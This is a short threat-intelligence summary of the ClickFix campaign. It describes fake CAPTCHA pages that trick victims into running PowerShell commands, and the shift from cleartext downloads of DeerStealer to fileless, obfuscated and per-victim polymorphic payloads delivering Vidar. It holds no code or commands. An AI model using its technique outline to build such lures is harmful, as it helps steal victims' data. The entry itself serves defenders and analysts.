The Evolution of ClickFix: From Cleartext to Server Side Polymorphism
Essential information
- Published
- 20/05/2026 11:12
- Modified
- 21/05/2026 16:46
- Tags
- 2026-05-20 base64 obfuscation clickfix deerstealer fake captcha fileless execution infostealer powershell server-side polymorphism vidar xor encryption
- Related entities
- 200 observables, 18 techniques (mitre), 2 malware, 200 others
Description
The ClickFix campaign has evolved from basic disk-based infections to sophisticated, obfuscated attacks using fake CAPTCHA pages that trick victims into executing malicious PowerShell commands. Initial variants used cleartext commands downloading batch scripts to deploy DeerStealer InfoStealer. The campaign advanced to fileless execution using XOR encryption or Base64 compression, operating entirely in memory. The most dangerous evolution involves server-side polymorphism, where attacker infrastructure dynamically generates unique obfuscated payloads for each victim, delivering Vidar InfoStealer. Active since March 2026 with surging activity through May, the campaign utilizes approximately 4,500 live domains. Both XOR and Base64 variants execute payloads in memory, download executables from attacker infrastructure, and delete traces to evade forensics.